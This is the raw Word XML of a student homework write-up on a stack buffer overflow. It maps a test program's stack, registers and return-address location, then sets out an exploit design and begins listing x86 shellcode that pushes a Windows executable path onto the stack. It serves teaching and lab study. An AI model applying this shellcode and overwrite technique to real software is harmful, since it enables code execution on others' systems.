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7992B" w14:textId="7B1494E8" w:rsidR="005B5182" w:rsidRPr="0041705D" w:rsidRDefault="003D3CBD" w:rsidP="0041705D">
      <w:pPr>
        <w:ind w:right="-1300"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF510C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="004B7F7D" w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buffer Overflow Homework Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB62A38" w14:textId="77777777" w:rsidR="005B5182" w:rsidRPr="009B343B" w:rsidRDefault="005B5182">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4F5EEF" w14:textId="404DF150" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Guidelines Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC9BB4C" w14:textId="18B3AF04" w:rsidR="00FD1D85" w:rsidRPr="00815B7A" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>===TASK_ONE_START===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0522A69A" w14:textId="6F46DF26" w:rsidR="00FD1D85" w:rsidRPr="00194445" w:rsidRDefault="00194445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the stack layout of our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77D1749D" w14:textId="7B959A44" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00AF510C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="354C2082" wp14:editId="360B247A">
            <wp:extent cx="5810534" cy="6910754"/>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838824" cy="6944400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="004B7F7D" w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3973B128" w14:textId="08C9EBAC" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F738379" w14:textId="303A0879" w:rsidR="00F1540E" w:rsidRPr="00E932F1" w:rsidRDefault="00194445">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C61688">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>And the register’s data:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C61688">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D63E572" wp14:editId="329FA4EE">
            <wp:extent cx="4037925" cy="3177234"/>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065078" cy="3198599"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A64C11" w14:textId="3C01223B" w:rsidR="004E773A" w:rsidRDefault="00F1540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The address of the stack that stores a return address is 0019FF3C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128B1085" w14:textId="575B95A4" w:rsidR="005F6487" w:rsidRDefault="00981CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F88A199" wp14:editId="65A28F56">
            <wp:extent cx="6645910" cy="54737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7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5473700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACE092E" w14:textId="77777777" w:rsidR="005F6487" w:rsidRDefault="005F6487">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43075483" w14:textId="0938AAD5" w:rsidR="00307242" w:rsidRDefault="00307242">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F6487">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Regarding the EBP register, whenever we start our application, EBP points to </w:t>
      </w:r>
      <w:r w:rsidR="005F6487" w:rsidRPr="005F6487">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0019FF94. After calling 004018D0, EBP re-points to 0019FF80</w:t>
      </w:r>
      <w:r w:rsidR="005F6487">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which points to 0019FF94, which also points to </w:t>
      </w:r>
      <w:r w:rsidR="005F6487">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0019FFDC</w:t>
      </w:r>
      <w:r w:rsidR="0017158B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which also points to 0019FFEC which ALSO points to 00000000</w:t>
      </w:r>
      <w:r w:rsidR="005F6487" w:rsidRPr="005F6487">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0017158B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0017158B" w:rsidRPr="0017158B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>That is the border of the program’s stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A27E689" w14:textId="77C3F167" w:rsidR="00DC2BC9" w:rsidRDefault="00DC2BC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72044060" w14:textId="5936F0FD" w:rsidR="00732422" w:rsidRPr="005B5182" w:rsidRDefault="000F5D39">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BC802A9" wp14:editId="50ABF8E1">
            <wp:extent cx="6645910" cy="484759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8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4847590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09320E9E" w14:textId="0C56AEF3" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>===TASK_ONE_END===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60677E4A" w14:textId="48E52EEE" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202F35ED" w14:textId="1156AF4E" w:rsidR="00FD1D85" w:rsidRPr="00874FB4" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>===TASK_TWO_START===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E34920C" w14:textId="1520CDF3" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00F65F18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here is the design of our exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E9F36A" w14:textId="4CE7BF1F" w:rsidR="00FD1D85" w:rsidRPr="00F65F18" w:rsidRDefault="00485EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="719BF8E0" wp14:editId="4A148827">
            <wp:extent cx="6843776" cy="2508531"/>
            <wp:effectExtent l="0" t="0" r="190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59478" cy="2550941"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA40440" w14:textId="01A34298" w:rsidR="00874FB4" w:rsidRDefault="00F65F18" w:rsidP="00BA3CF6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is just happened, that the buffer we had is plenty enough for our exploit. In other cases, you </w:t>
      </w:r>
      <w:r w:rsidR="00194445">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">must fill the rest of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00436173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer with some fillers like NOP instructions</w:t>
      </w:r>
      <w:r w:rsidR="00194445">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00194445" w:rsidRPr="00C61688">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00BA3CF6" w:rsidRPr="00C61688">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r any other random characters, in our case ‘a’</w:t>
      </w:r>
      <w:r w:rsidRPr="00C61688">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C8481" w14:textId="10B81A29" w:rsidR="00874FB4" w:rsidRDefault="00874FB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0C9204" w14:textId="77777777" w:rsidR="00436173" w:rsidRDefault="00436173">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606B124C" w14:textId="01D05025" w:rsidR="00436173" w:rsidRPr="00BE1A6B" w:rsidRDefault="00436173">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Now, speaking of our assembly code:</w:t>
      </w:r>
      <w:r w:rsidR="00137109" w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A7BB5" w14:textId="2DCC213A"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00401001      83C4 80       </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">ADD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP,-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35788C45" w14:textId="26E0A245"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00401004      31C0          </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">XOR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EAX,EAX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6CAA11C6" w14:textId="1C038281"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00401006      50            </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378C98C" w14:textId="4DB24F00"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00401007      68 65222020   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 20202265</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD8D9FF" w14:textId="4C8D9F6C"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0040100C      68 6B2E6578   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 78652E6B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292FF92F" w14:textId="7029C5B4"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00401011      68 5C776C63   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 636C775C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307748FB" w14:textId="0D927192"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00401016      68 666C6F77   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 776F6C66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3794E8" w14:textId="461BA629"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0040101B      68 4F766572   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 7265764F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E586C4F" w14:textId="2DC24E9C"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00401020      68 66666572   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 72656666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313FFF6C" w14:textId="124E76BD"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00401025      68 705C4275   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 75425C70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F369B36" w14:textId="672DEFBF"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0040102A      68 736B746F   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 6F746B73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CED63AC" w14:textId="68537057"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0040102F      68 745C4465   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 65445C74</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A159D77" w14:textId="6409A068"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00401034      68 7564656E   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 6E656475</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A46D24B" w14:textId="605B97B6"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00401039      68 735C7374   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 74735C73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE6EF2" w14:textId="34D80A78"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0040103E      68 55736572   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
